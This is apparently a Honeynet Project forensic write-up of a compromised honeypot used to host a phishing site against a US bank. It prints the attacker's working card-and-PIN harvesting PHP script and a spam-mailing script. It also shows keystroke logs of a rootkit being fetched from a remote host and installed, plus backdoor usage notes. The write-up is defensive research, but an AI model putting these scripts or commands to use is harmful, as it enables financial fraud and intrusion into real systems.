Details of UK compromise

Details about the UK compromise

Analysis

This honeynet was a high interaction research honeynet deployed by the UK Honeynet Project in a UK ISP data centre. After a few hours of general background network activity, the Redhat Linux 7.3 honeypot was scanned, compromised and an IRC server installed. A number of further compromises occurred, as multiple attackers located the vulnerable system and exploited it for their own purposes, before the honeypot server was used to host a phishing attack targeting a well known US bank. For brevity, this detailed analysis of the uploaded content only covers the activity relevant to the phishing attack.

The first zip file downloaded was bank.zip, via wget from the Romanian FTP server host2.go.ro.

# md5sum bank.zip
8045fd244fc96576e98a2c88b3b420b4   bank.zip
# ls -l bank.zip
-rw-r--r--    1 root     root        39988 Jul 26 10:12 bank.zip
# file bank.zip
bank.zip: Zip archive data, at least v2.0 to extract

The file was a valid zip archive, and contained the following data:

Length    Date   Time Name
-------- ----   ----    ----
1217      02-02-04 03:48 BankInternetBankingfiles/ConnectionSecured.gif
483       02-02-04 03:48 BankInternetBankingfiles/EnrollToday.gif
293       02-02-04 03:48 BankInternetBankingfiles/MemberFDIC.gif
475       02-02-04 03:48 BankInternetBankingfiles/TakeATour.gif
25088     02-02-04 03:48 BankInternetBankingfiles/Thumbs.db
51        02-02-04 03:48 BankInternetBankingfiles/arrow_red.gif
57        02-02-04 03:48 BankInternetBankingfiles/arrow_red2.gif
1214      02-02-04 03:48 BankInternetBankingfiles/bbarleft.gif
1318      02-02-04 03:48 BankInternetBankingfiles/bbarmiddle.gif
2390      02-02-04 03:48 BankInternetBankingfiles/bbarright.gif
959       02-02-04 03:48 BankInternetBankingfiles/conversionWelcome.js
222       02-02-04 03:48 BankInternetBankingfiles/footer_curve.gif
4527      02-02-04 03:48 BankInternetBankingfiles/global.css
370       02-02-04 03:48 BankInternetBankingfiles/login.gif
1489      02-02-04 03:48 BankInternetBankingfiles/logo.gif
10519     02-02-04 03:48 BankInternetBankingfiles/logon.js
947       02-02-04 03:48 BankInternetBankingfiles/showDemo.js
43        02-02-04 03:48 BankInternetBankingfiles/spacer.gif
583       02-02-04 03:48 BankInternetBankingfiles/top_nav.gif
0         07-04-04 02:56 BankInternetBankingfiles/
1752      07-04-04 03:19 check.php
22085     07-04-04 03:11 index.htm
1412      07-04-04 03:14 Scrisoare.html
--------                 -------
77494                    23 files

This was a pre-prepared web site that mimics the official login page for a major US bank. It included a server side PHP script called check.php, intended to harvest any credentials entered by an unsuspecting end user and email them to the phisher. The presence of a Thumbs.db file suggests that the contents was prepared on a MS Windows system. Scrisoare is the Romanian word for letter, suggesting an email or message or Romanian origin.

Analysis of the check.php script (shown below) reveals that this script is a more advanced version of the script used the German phishing incident. Basic checks on the card number received have been added, along with a refinement that uses the credit card number to classify cards into different types and insert the type into the subject line of the email. This suggests basic scripting abilities and not just a simple script kiddie.

The check.php script:

<?php
$ccnumber = $_POST['ccnumber'];
$cvv2 = $_POST['cvv2'];
$atm = $_POST['atm'];
$expmonth = $_POST['expmonth'];
$expyear = $_POST['expyear'];
if(!$ccnumber || !$cvv || !$atm || !$expmonth || !$expyear)
{       header("Location: http://69.44.XXX.XXX/.internet_banking_logon/RequestRouterifrequestCmdId-DisplayLoginPage/index.htm"); }
else
{
 if(!ereg("^[0-9]{14,16}",$ccnumber))
{       header("Location: http://69.44.XXX.XXX/.internet_banking_logon/RequestRouterifrequestCmdId-DisplayLoginPage/index.htm"); }
 else
 {
if(!ereg("^[0-9]{3,4}",$cvv))
{       header("Location: http://69.44.XXX.XXX/.internet_banking_logon/RequestRouterifrequestCmdId-DisplayLoginPage/index.htm"); }
  else
   {
$comi="phisher@xxx.us";
     $from_name="$first $last";
$from_address="CC@targetbank.com";
     $mesaj = "CreditCard Number : $ccnumber
CVV2 : $cvv
PIN : $atm
Expiration Date : $expmonth - $expyear";
     if(ereg('^4[0-9]{13,17}$', $ccnumber))
     {  mail($comi, "BANK [VISA ]", $mesaj, "From: <{$from_address}>\r\n");}
     else { }
     if(ereg('^5[0-9]{13,17}$', $ccnumber))
     {mail($comi, "BANK [MasterCard ]", $mesaj, "From: <{$from_address}>\r\n");}
     else { }
     if(ereg('^3[0-9]{13,17}$', $ccnumber))
     { mail($comi, "BANK [American Express ]", $mesaj, "From: <{$from_address}>\r\n");}
     else { }
     if(ereg('^6[0-9]{13,17}$', $ccnumber))
     {mail($comi, "BANK [Discover ]", $mesaj, "From: <{$from_address}>\r\n");}
     else { }
     echo "
     <html>
     <body>
     <script language='javascript'>
window.location='https://www.targetbank.com/internetBanking/RequestRouter?requestCmdId=DisplayLoginPage';
     </script>

     &lt;/html&gt;
     ";
    }
   }
  }
?>

A hard coded IP address of 66.XXX.XXX.XXX was included in the original script, suggesting that the script had already been used on an alternate server (either another compromised host or a test machine local to the attacker). This IP address appears to be a home DSL IP block belonging to a US carrier and no web site is hosted there now. This script also links directly to the real target bank web site, presumably for added realism and to attempt to confuse recipients.

The second file downloaded using FTP was bank1.tgz:

# file bank1.tgz
bank1.tgz: gzip compressed data, from Unix
# md5sum bank1.tgz
36ae12dcc6d36b55f5289464e092a45e bank1.tgz
# ls -l bank1.tgz
-rw-r--r--    1 root     root 36065 Aug  2 10:09 bank1.tgz

The file was a valid tgz archive, and contained the following data:

./bank
./bank/BankInternetBankingfiles
./bank/BankInternetBankingfiles/ConnectionSecured.gif
./bank/BankInternetBankingfiles/EnrollToday.gif
./bank/BankInternetBankingfiles/MemberFDIC.gif
./bank/BankInternetBankingfiles/TakeATour.gif
./bank/BankInternetBankingfiles/Thumbs.db
./bank/BankInternetBankingfiles/arrow_red.gif
./bank/BankInternetBankingfiles/arrow_red2.gif
./bank/BankInternetBankingfiles/bbarleft.gif
./bank/BankInternetBankingfiles/bbarmiddle.gif
./bank/BankInternetBankingfiles/bbarright.gif
./bank/BankInternetBankingfiles/conversionWelcome.js
./bank/BankInternetBankingfiles/footer_curve.gif
./bank/BankInternetBankingfiles/global.css
./bank/BankInternetBankingfiles/login.gif
./bank/BankInternetBankingfiles/logo.gif
./bank/BankInternetBankingfiles/logon.js
./bank/BankInternetBankingfiles/showDemo.js
./bank/BankInternetBankingfiles/spacer.gif
./bank/BankInternetBankingfiles/top_nav.gif
./bank/popup.html
./bank/index.htm

The attacker moved the new files into location in the web root and used the pico editor to change popup.html to point to a test server (http://69.24.XX.XX/testing.php). Again, this was possibly a previously compromised host or a system local to the attacker.

Interestingly, because this FTP session was plain text and the attacker helpfully used the directory listing command, we can observe the attacker�s activities and also see what other tools they have stored in their FTP area. Directory listings are often very useful in providing further background detail during incident analysis:

220 Go.ro Members FTP

USER xxxxxxxxx
331 Password required for phiser.

PASS xxxxxxxxx
230 User phisher logged in.

SYST
215 UNIX Type: L8

PASV
227 Entering Passive Mode (81,196,XXX,XXX,99,226).

LIST
150 Opening ASCII mode data connection for file list
-rw-r--r--   1 free     web 1890 Jun 16 01:03 Desktop.zip
-rw-r--r--   1 free     web 6536 Jul 19 11:26 Scrisori.zip
-rw-r--r--   1 free     web 2788 Jun 16 18:29 bla1.txt
-rw-r--r--   1 free     web 14834 Jun 17 13:16 ebay only
-rw-r--r--   1 free     web 247127 Jun 14 19:58 emailer2.zip
-rw-r--r--   1 free     web 467214 Jun 10 08:36 eros.tgz
-rw-r--r--   1 free     web 417494 Jul 18 22:27 ex.tgz
-rw-r--r--   1 free     web 2833 Jul 11 16:55 flit.tgz
-rw-r--r--   1 free     web 7517 Jun 11 11:53 html1.zip
-rw-r--r--   1 free     web 10383 Jul  3 19:07 index.html
-rw-r--r--   1 free     web 413 Jul 18 22:09 index.zip
drwxr-xr-x   2 free     web 54 Jul 11 04:49 listz
-rw-r--r--   1 free     web 246920 Jun 14 20:38 massmail.tgz
-rw-r--r--   1 free     web 8192 Jun 12 07:18 massmail.zip
-rw-r--r--   1 free     web 0 Jun 17 10:09 neptun.tgz
-rw-r--r--   1 free     web 310132 Jun 11 09:25 paginabuna1.tgz
-rw-r--r--   1 free     web 54818 Jun 18 23:24 scampagededat1.zip
-rw-r--r--   1 free     web 12163 Jun  9 01:31 send.php
-rw-r--r--   1 free     web 2094 Jun 20 11:49 sendspamAOL1.tgz
-rw-r--r--   1 free     web 2173 Jun 14 22:58 sendspamBUN1.tgz
-rw-r--r--   1 free     web 2783 Jun 15 00:21 sendspamBUNzip1.zip
-rw-r--r--   1 free     web 2096 Jun 16 18:46 sendspamNEW1.tgz
-rw-r--r--   1 free     web 574 Jul 11 01:08 sendbank1.tgz
-rw-r--r--   1 free     web 3238 Jul 18 23:07 sendbankNEW.tgz
-rw-r--r--   1 free     web 64443 Jun 11 02:33 spam
-rw-r--r--   1 free     web 83862 Jun  9 09:56 spamz.zip
drwxr-xr-x   2 free     web 64 Jul 16 12:05 stuff
-rw-r--r--   1 free     web 2424 Jul 19 11:27 suntrust.zip
-rw-r--r--   1 free     web 36441 Jul 18 00:52 usNEW.zip
-rw-r--r--   1 free     web 36065 Jul 11 17:04 bank1.tgz
drwxr-xr-x   2 free     web 49 Jul 16 12:26 banka
-rw-r--r--   1 free     web 301939 Jun  8 13:17 www1.tar.gz
-rw-r--r--   1 free     web 327380 Jun  7 16:24 www1.zip
226 Transfer complete.

CWD banka
250 CWD command successful.

PASV
227 Entering Passive Mode (81,196,XXX,XXX,115,151).

LIST
150 Opening ASCII mode data connection for file list
-rw-r--r--   1 free     web 1765 Jul   3 18:25 check.php
-rw-r--r--   1 free     web 39988 Jul  3 18:25 bank.zip
-rw-r--r--   1 free     web 40152 Jul 16 12:26 banka.zip
226 Transfer complete.

CWD ..
250 CWD command successful.

PASV
227 Entering Passive Mode (81,196,XXX,XXX,133,197).

LIST
150 Opening ASCII mode data connection for file list
-rw-r--r--   1 free     web 1890 Jun 16 01:03 Desktop.zip
-rw-r--r--   1 free     web 6536 Jul 19 11:26 Scrisori.zip
-rw-r--r--   1 free     web 2788 Jun 16 18:29 bla1.txt
-rw-r--r--   1 free     web 14834 Jun 17 13:16 ebay only
-rw-r--r--   1 free     web 247127 Jun 14 19:58 emailer2.zip
-rw-r--r--   1 free     web 467214 Jun 10 08:36 eros.tgz
-rw-r--r--   1 free     web 417494 Jul 18 22:27 ex.tgz
-rw-r--r--   1 free     web 2833 Jul 11 16:55 flit.tgz
-rw-r--r--   1 free     web 7517 Jun 11 11:53 html1.zip
-rw-r--r--   1 free     web 10383 Jul  3 19:07 index.html
-rw-r--r--   1 free     web 413 Jul 18 22:09 index.zip
drwxr-xr-x   2 free     web 54 Jul 11 04:49 listz
-rw-r--r--   1 free     web 246920 Jun 14 20:38 massmail.tgz
-rw-r--r--   1 free     web 8192 Jun 12 07:18 massmail.zip
-rw-r--r--   1 free     web 0 Jun 17 10:09 neptun.tgz
-rw-r--r--   1 free     web 310132 Jun 11 09:25 paginabuna1.tgz
-rw-r--r--   1 free     web 54818 Jun 18 23:24 scampagededat1.zip
-rw-r--r--   1 free     web 12163 Jun  9 01:31 send.php
-rw-r--r--   1 free     web 2094 Jun 20 11:49 sendspamAOL1.tgz
-rw-r--r--   1 free     web 2173 Jun 14 22:58 sendspamBUN1.tgz
-rw-r--r--   1 free     web 2783 Jun 15 00:21 sendspamBUNzip1.zip
-rw-r--r--   1 free     web 2096 Jun 16 18:46 sendspamNEW1.tgz
-rw-r--r--   1 free     web 1574 Jul 11 01:08 sendbank1.tgz
-rw-r--r--   1 free     web 2238 Jul 18 23:07 sendbankNEW.tgz
-rw-r--r--   1 free     web 64443 Jun 11 02:33 spam
-rw-r--r--   1 free     web 83862 Jun  9 09:56 spamz.zip
drwxr-xr-x   2 free     web 64 Jul 16 12:05 stuff
-rw-r--r--   1 free     web 2424 Jul 19 11:27 suntrust.zip
-rw-r--r--   1 free     web 36441 Jul 18 00:52 usNEW.zip
-rw-r--r--   1 free     web 36065 Jul 11 17:04 bank1.tgz
drwxr-xr-x   2 free     web 49 Jul 16 12:26 banka
-rw-r--r--   1 free     web 301939 Jun  8 13:17 www1.tar.gz
-rw-r--r--   1 free     web 327380 Jun  7 16:24 www1.zip
226 Transfer complete.

TYPE I
200 Type set to I

PASV
227 Entering Passive Mode (81,196,XXX,XXX,113,86).

RETR bank1.tgz
150 Opening BINARY mode data connection for bank1.tgz (36065 bytes)

226 Transfer complete.
QUIT

221 Goodbye.

The contents of this FTP server home directory suggests that the phisher is heavily involved in spam and phishing activities, with pre-built content and message delivery tools targeting many well known online brands stored on this server. Based on this captured session, this phishing activity is not likely to be an isolated incident.

The third file downloaded was sendbankNEW.tgz from the Romain FTP server host2.go.ro.

# md5sum sendbankNEW.tgz
f38bd5496b51881ee6d13aa6f41cd156
# file sendbankNEW.tgz
sendbankNEW.tgz     gzip compressed data, from Unix

The file was a valid archive and contained the following files:

total 20
-rw-r--r--  1 1002 1002  724 Nov  4  2003 ini.inc
-rw-r--r--  1 1002 1002  101 Jun 14 23:44 list.txt
-rw-r--r--  1 1002 1002  607 Jul 17 14:21 bank.php
-rw-rw-rw-  1 root root 7564 Jul 19 00:04 bla.txt

The purpose of each file is listed in the table below:

File

 Contents and purpose
ini.inc

 Spam sending configuration
list.txt

 This file contained a list of 5 email addresses to send spam email to. Because of the limited size and Romanian email addresses linked to the attacker, this was presumably the email addresses of fellow gang members and not a real phishing attack
bank.php

 A simple PHP script to read the contents of a text file (bla.txt) and email it to each recipient in an input file (list.txt)

The email lure blah.txt was notable for having good grammar and spelling, legalise at the bottom about "Equal Opportunity Lending" and heavy use of files linked directly from the official web site of the targeted bank, all of which help it to appear more realistic. One ironic point to note is that the email even included an exhortation to not provide passwords to fraudulent web sites, or to ever email your password to a third party!

The bank.php mass emailing script to send spam advertising this particular phishing scam is shown below:

<?php
include("ini.inc");
$mail_header  = "From:

XXXXXXXXX<restore@targetbank.com>\n";
$mail_header .= "Content-Type: text/html\n";
$subject="In attention of Target Bank Members ! Restore Your Account Now!";
$body=loadini("bla.txt");
if (!($fp = fopen("list.txt", "r")))
        exit("Unable to

open $listFile.");
$i=0;
print "Start time is "; print date("Y:m:d H:i"); print

"\n";
while (!feof($fp)) {
        fscanf($fp, "%s", $name);
        $i++;

mail($name, $subject, $body, $mail_header);
}
print "End time is "; print date("Y:m:d

H:i"); print "\n";
print "$i"; print "emails sent."; print"\n";
?>

Although simple, it is functional and could easily have been used to send many more messages than the 5 test messages sent from the honeynet. The honeynet architecture would have restricted outbound emails, but the honeypot was taken offline for forensic analysis before any bulk spam email could be sent by the attacker.

Timeline

This honeynet was a high interaction research honeynet deployed by the UK Honeynet Project in a UK ISP data centre. After a few hours of general background network activity, the Redhat Linux 7.3 honeypot was scanned, compromised and an IRC server installed. A number of further compromises occurred, as multiple attackers located the vulnerable system and exploited it for their own purposes, before the honeypot server was used to host a phishing attack targeting a well known US bank. For brevity, this detailed timeline only covers the activity relevant to the phishing attack.

Detailed timeline:

18/07/04 - 12:30. First the attacker exploits a buffer overflow in the samba server on the Redhat Linux 7.3 honeypot, as can be seen from the snort alerts shown below:

[**] [1:2103:9] NETBIOS SMB trans2open buffer overflow attempt [**]
[Classification: Attempted Administrator Privilege Gain] [Priority: 1]
07/18-12:30:37.816057 69.44.XXX.XXX:47938 -> 10.2.2.120:139
TCP TTL:53 TOS:0x0 ID:29658 IpLen:20 DgmLen:1500 DF
***A**** Seq: 0x476AC1E0 Ack: 0x2E249707&nbsp; Win: 0xB68 TcpLen: 32
TCP Options (3) => NOP NOP TS: 214020820 6062617
[Xref=> <a href="http://www.digitaldefense.net/labs/advisories/DDI-1013.txt">http://www.digitaldefense.net/labs/advisories/DDI-1013.txt</a>]
[Xref => <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2003-0201">http://cve.mitre.org/cgi-bin/cvename.cgi?name=2003-0201</a>]
[Xref=> <a href="http://www.securityfocus.com/bid/7294">http://www.securityfocus.com/bid/7294</a>]

[**] [1:648:7] SHELLCODE x86 NOOP [**]
[Classification: Executable code was detected] [Priority: 1]
07/18-12:30:37.817422 69.44.XXX.XXX:47938 -&gt; 10.2.2.120:139
TCP TTL:53 TOS:0x0 ID:29659 IpLen:20 DgmLen:1500 DF
***AP*** Seq: 0x476AC788 Ack: 0x2E249707&nbsp; Win: 0xB68 TcpLen: 32
TCP Options (3) =&gt; NOP NOP TS: 214020820 6062617
[Xref =&gt; <a href="http://www.whitehats.com/info/IDS181">http://www.whitehats.com/info/IDS181</a>]

18/07/04 - 12:30. After a few retries with different offsets, the samba exploit (CAN-2003-0201) succeeds and returns a root prompt to the attacker, as show by the snort alert below:

[**] [1:498:6] ATTACK-RESPONSES id check returned root [**]
[Classification: Potentially Bad Traffic] [Priority: 2]
07/18-12:30:55.511182 10.2.2.120:45295 -> 69.44.XXX.XXX:48283
TCP TTL:64 TOS:0x0 ID:56468 IpLen:20 DgmLen:140 DF

***AP*** Seq: 0x2E1F5FBE Ack: 0x47D426D5&nbsp; Win: 0x16A0 TcpLen: 32
TCP Options (3) => NOP NOP TS: 6064395 214022589

18/07/04 - 12:30. After gaining root access, the attacker check who they are and who else is logged into the system before attempting to hide their activities by turning off shell history logging. The Sebek keystrokes for this session are shown below:

[2004-07-18 12:30:55 10.2.2.120 11675 sh 0]unset HISTFILE; echo "### 0wned this server ###";
                                           uname -a;id;uptime;ca
[2004-07-18 12:30:55 10.2.2.120 11675 sh 0]su
[2004-07-18 12:30:59 10.2.2.120 11851 bash 0]unset HISTFILE
[2004-07-18 12:31:01 10.2.2.120 11851 bash 0]unset HISTSAVE
[2004-07-18 12:31:03 10.2.2.120 11851 bash 0]unset HISTLOG

18/07/04 - 12:31. The attacker then proceeds to downloading what appears to be an image file from a remote web server using the wget command line HTTP client:

[2004-07-18 12:31:06 10.2.2.120 11851 bash 0]mkdir /dev/hpd
[2004-07-18 12:31:08 10.2.2.120 11851 bash 0]cd /dev/hpd
[2004-07-18 12:31:09 10.2.2.120 11851 bash 0]id
[2004-07-18 12:31:10 10.2.2.120 11851 bash 0]w
[2004-07-18 12:31:17 10.2.2.120 11851 bash 0]wget host1.3x.ro/shv4.jpg

18/07/04 - 12:32. The attacker unpacks the image file, which is actually a gziped tar archive, before extracting and running a setup program:

[2004-07-18 12:32:21 10.2.2.120 11851 bash 0]tar zxvf shv4.jpg ; rm -rf shv4.jpg
[2004-07-18 12:32:23 10.2.2.120 11851 bash 0]cd shv4
[2004-07-18 12:32:28 10.2.2.120 11851 bash 0]./setup admin 2277

The attackers view of this session can be found here. Analysis showed that the malware installed was the SHV4 root kit, previously the subject of the Honeynet Projects Scan of the Month challenge 29.

From the SHV4 root kit source code, we can determine what the setup command does:

# USAGE:
# ./setup pass port
#
# SSHD backdoor: ssh -l root -p port hostname
# when prompted for password enter your rootkit password
# login backdoor: DISPLAY=pass&nbsp;; export DISPLAY&nbsp;; telnet victim
# type anything at login, and type arf for pass and b00m r00t
#
# if u g3t cought d0nt blaim us&nbsp;!!

The attacker has installed and configured an encrypted backdoor on the honeypot, bound to TCP port 2277. A large amount of other activity occurs on the system over the next few 12-72 hours, including installation of PsyBNC IRC servers by a Romanian group, installation and usage of the mole and mazz mass scanners (probably the autorooter used to compromise this honeypot), installation and re-installation of other rootkits, password sniffing and various other activities not relevant to the main phishing attack.

23/07/04 - 21:11. The attacker returns from 192.226.XXX.XXX (a Windows 2000 or Windows XP PC in Ontario) via the SSH backdoor listening on TCP port 2277 and checks if the server is still active and who is logged in:

[2004-07-23 21:11:58 xntps 0]SSH-1.5-PuTTY-Release-0.52
[2004-07-23 21:12:39 bash 0]discovery[BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS]
                            [BS][BS][BS][BS][BS][BS][BS][BS][BS][BS]w
[2004-07-23 21:12:44 bash 0]unset HISTFILE
[2004-07-23 21:12:46 bash 0]unset HISTSAVE

23/07/04 - 21:13. The attacker reconnects, prepares a directory in the Apache web server's document root and then downloads some pre-built web content from a Romanian web server using, again using wget, before checking the honeypot's IP address and PHP configuration:

[2004-07-23 21:13:06 10.2.2.120 16984 xntps 0]SSH-1.5-PuTTY-Release-0.54
[2004-07-23 21:13:26 10.2.2.120 16986 bash 0]unset HISTFILE
[2004-07-23 21:13:29 10.2.2.120 16986 bash 0]cd /var/www
[2004-07-23 21:13:29 10.2.2.120 16986 bash 0]ls
[2004-07-23 21:13:30 10.2.2.120 16986 bash 0]ls -a
[2004-07-23 21:13:35 10.2.2.120 16986 bash 0]cd html
[2004-07-23 21:13:35 10.2.2.120 16986 bash 0]ls -a
[2004-07-23 21:13:52 10.2.2.120 16986 bash 0]mk[BS][BS][BS][BS][BS][BS][BS]mkdir .internetBankingLogon
[2004-07-23 21:13:59 10.2.2.120 16986 bash 0]cd [BS][BS][BS][BS][BS][BS]ls
[2004-07-23 21:14:43 10.2.2.120 16986 bash 0]wget host2.go.ro/bank/bank.zip

23/07/04 - 21:15. The attacker attempts to extract the contents of the zip file but finds it is corrupt and deletes it.

[2004-07-23 21:15:23 10.2.2.120 16986 bash 0]tar xzvf ba[BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS]
                                                  [BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS]
                                                  [BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS]
                                                  [BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS]
                                                  [BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS]
                                                  unzip bank.zip
[2004-07-23 21:15:26 10.2.2.120 16986 bash 0]ls -a
[2004-07-23 21:15:36 10.2.2.120 16986 bash 0]tar xzvf bank.zip
[2004-07-23 21:15:42 10.2.2.120 16986 bash 0]rm -rf bank.zip

23/07/04 - 21:16. The attacker changes tools and gets another file using FTP, again from the same web server in Romania, which does extract successfully this time:

[2004-07-23 21:15:53 10.2.2.120 16986 bash 0]ftp host2.go.ro
[2004-07-23 21:16:05 10.2.2.120 17044 ftp 0]hash
[2004-07-23 21:16:06 10.2.2.120 17044 ftp 0]ls
[2004-07-23 21:16:09 10.2.2.120 17044 ftp 0]cd bank
[2004-07-23 21:16:09 10.2.2.120 17044 ftp 0]ls
[2004-07-23 21:16:13 10.2.2.120 17044 ftp 0]cd ..
[2004-07-23 21:16:14 10.2.2.120 17044 ftp 0]ls
[2004-07-23 21:16:40 10.2.2.120 17044 ftp 0]get bank1.tgz
[2004-07-23 21:16:45 10.2.2.120 17044 ftp 0]bye
[2004-07-23 21:16:46 10.2.2.120 16986 bash 0]ls
[2004-07-23 21:16:52 10.2.2.120 16986 bash 0]tar xzvf bank1.tgz
[2004-07-23 21:16:54 10.2.2.120 16986 bash 0]ls
[2004-07-23 21:17:03 10.2.2.120 16986 bash 0]rm -rf bank1
[2004-07-23 21:17:04 10.2.2.120 16986 bash 0]ls
[2004-07-23 21:17:19 10.2.2.120 16986 bash 0]mv bank .internetBankingLogon
[2004-07-23 21:17:20 10.2.2.120 16986 bash 0]ls

23/07/04 - 21:17. The attacker edits the extracted web content and updates the HTML to point to a testing PHP script on a remote web server:

[2004-07-23 21:17:23 10.2.2.120 16986 bash 0]cd .internetBankingLogon
[2004-07-23 21:17:24 10.2.2.120 16986 bash 0]ls
[2004-07-23 21:17:29 10.2.2.120 16986 bash 0]pico
[2004-07-23 21:17:44 10.2.2.120 16986 bash 0]pico popup.htm
[2004-07-23 21:17:48 10.2.2.120 17058 pico 0][U-ARROW]l
[2004-07-23 21:18:41 10.2.2.120 16986 bash 0]pico popup.html
[2004-07-23 21:19:04 10.2.2.120 17060 pico 0][D-ARROW][D-ARROW][D-ARROW][D-ARROW][D-ARROW][D-ARROW][D-ARROW][D-ARROW]
                                                  [D-ARROW][D-ARROW][D-ARROW][D-ARROW][D-ARROW][D-ARROW][D-ARROW][D-ARROW]
                                                  [D-ARROW][D-ARROW][D-ARROW][D-ARROW][D-ARROW][D-ARROW][D-ARROW][D-ARROW]
                                                  [D-ARROW][D-ARROW][D-ARROW][D-ARROW][D-ARROW][D-ARROW][D-ARROW][D-ARROW]
                                                  [D-ARROW][D-ARROW][D-ARROW][D-ARROW][D-ARROW][D-ARROW][D-ARROW][D-ARROW]
                                                  [D-ARROW][D-ARROW][D-ARROW][D-ARROW][D-ARROW][D-ARROW][D-ARROW][D-ARROW]
                                                  [D-ARROW][D-ARROW][D-ARROW][D-ARROW][D-ARROW][D-ARROW][D-ARROW][D-ARROW]
                                                  [D-ARROW][D-ARROW][D-ARROW][D-ARROW][D-ARROW][D-ARROW][D-ARROW]php
[2004-07-23 21:19:17 10.2.2.120 16936 bash 0]telbnet
[2004-07-23 21:19:19 10.2.2.120 16936 bash 0]
[2004-07-23 21:22:19 10.2.2.120 17060 pico 0][L-ARROW][L-ARROW][L-ARROW][L-ARROW][L-ARROW][L-ARROW][L-ARROW][L-ARROW]
                                                  [R-ARROW][R-ARROW][R-ARROW][R-ARROW][R-ARROW][R-ARROW][R-ARROW][R-ARROW]
                                                  [R-ARROW][R-ARROW][R-ARROW][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS]
                                                  [BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS]
                                                  [BS][BS][BS][BS][BS][BS][BS][BS]http://69.24.XXX.XXX/testing.php[D-ARROW]
                                                  [L-ARROW][L-ARROW][U-ARROW][U-ARROW][D-ARROW][D-ARROW][U-ARROW][U-ARROW]
                                                  [D-ARROW][R-ARROW]y

23/07/04 - 21:22. The attacker checks the network configuration of the honeypot and version of PHP installed:

[2004-07-23 21:22:29 10.2.2.120 16986 bash 0]ls
[2004-07-23 21:22:31 10.2.2.120 16986 bash 0]pwd
[2004-07-23 21:25:06 10.2.2.120 16986 bash 0]/sbin/ifconfig
[2004-07-23 21:25:25 10.2.2.120 16936 bash 0]sense
[2004-07-23 21:48:36 10.2.2.120 16936 bash 0]php
[2004-07-23 21:48:42 10.2.2.120 16936 bash 0]/sbin/ifconfig
[2004-07-23 22:10:26 10.2.2.120 16936 bash 0]sense
[2004-07-23 22:28:32 10.2.2.120 16936 bash 0]ade[BS][BS][BS][BS][BS]qw
[2004-07-23 22:28:33 10.2.2.120 16936 bash 0]w

25/07/04 - 21:42. The attacker opens a second session, checks again if PHP is configured correctly on the honeypot and downloads a tool for sending spam email from the same Romanian web server:

[2004-07-25 21:42:25 xntps 0]SSH-1.5-PuTTY-Release-0.54
[2004-07-25 21:42:46 bash 0]unset HISTFILE
[2004-07-25 21:42:50 bash 0]cat /etc/hosts
[2004-07-25 22:07:28 bash 0]php
[2004-07-25 22:07:32 bash 0]cd /tmp
[2004-07-25 22:07:41 bash 0]wget host2.go.ro/sendbankNEW.tgz
[2004-07-25 22:07:50 bash 0]tar xzvf sendbankNEW.tgz&nbsp;; rm -rf sendbankNEW.tgz

25/07/04 - 22:08. The attacker checks an input list email addresses and runs a PHP script to send spam email:

[2004-07-25 22:08:00 bash 0]cd sendbank/
[2004-07-25 22:08:01 bash 0]ls
[2004-07-25 22:08:09 bash 0]cat list.
[2004-07-25 22:08:46 bash 0]ls
[2004-07-25 22:08:52 bash 0]php bank.php

25/07/04 - 22:10. The attacker edits the content of the spam message, points it a co-located Linux web server running an American student web site, and runs the PHP script to send spam email again:

[2004-07-25 22:10:22 bash 0]pico bla.txt
[2004-07-25 22:10:26 pico 0]php
[2004-07-25 22:13:33 pico 0][L-ARROW][L-ARROW][L-ARROW][L-ARROW][L-ARROW][L-ARROW][L-ARROW][L-ARROW]
                            [L-ARROW][L-ARROW][L-ARROW][L-ARROW][L-ARROW][L-ARROW][L-ARROW][L-ARROW]
                            [L-ARROW][L-ARROW][L-ARROW][L-ARROW][L-ARROW][L-ARROW][L-ARROW][L-ARROW]
                            [L-ARROW][L-ARROW][L-ARROW][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS]
                            [BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS]<strong>XXX.com</strong>/.y
[2004-07-25 22:13:36 bash 0]php bank.php
[2004-07-25 22:24:48 bash 0]cd ..
[2004-07-25 22:24:49 bash 0]ls
[2004-07-25 22:24:53 bash 0]rm -rf sendbank

The attackers initial test at 22:08:52 works as planned, with 5 test messages being successfully sent (although due to the outbound traffic restrictions on the Honeywall, further mass mailing attempts would fail). However, after 10 minutes wait the attacker cleans up and leaves without sending any further messages from this honeypot.

Phishing Incident Victims

In this side note we provide an overview of the source IP addresses of potential victims in the UK phishing attack against a major US bank described in phishing technique one. The data below was collected with the help of the compromised UK honeypot and network packet captures. Over a period of about 4 days we observed 265 inbound HTTP requests to the honeypot, presumably recipients of a spam phishing email who were tricked into accessing the redirected content by clicking on the link provided. All were potential victims of the phishing attack, but none actually submitted personal data and therefore the phishing attack was unsucessful.

IP ISP Country OS
4.138.NNN.NNN Level 3 US Windows XP, 2000 SP2+ (NAT!)
4.224.NNN.NNN Level 3 US Windows 98
4.235.NNN.NNN Level 3 US Windows XP, 2000 SP2+ (NAT!)
4.239.NNN.NNN Level 3 US Windows XP, 2000 SP2+
12.202.NNN.NNN AT&T; US FreeBSD 4.7
12.217.NNN.NNN AT&T; US Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222)
12.218.NNN.NNN AT&T; US UNKNOWN
24.16.NNN.NNN Comcast Cable US Windows XP Pro SP1, 2000 SP3
24.58.NNN.NNN Road Runner US Windows XP Pro SP1, 2000 SP3
24.59.NNN.NNN Road Runner US Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222)
24.62.NNN.NNN Comcast Cable US Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222)
24.90.NNN.NNN Road Runner US Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222)
24.93.NNN.NNN Road Runner US Windows XP Pro SP1, 2000 SP3
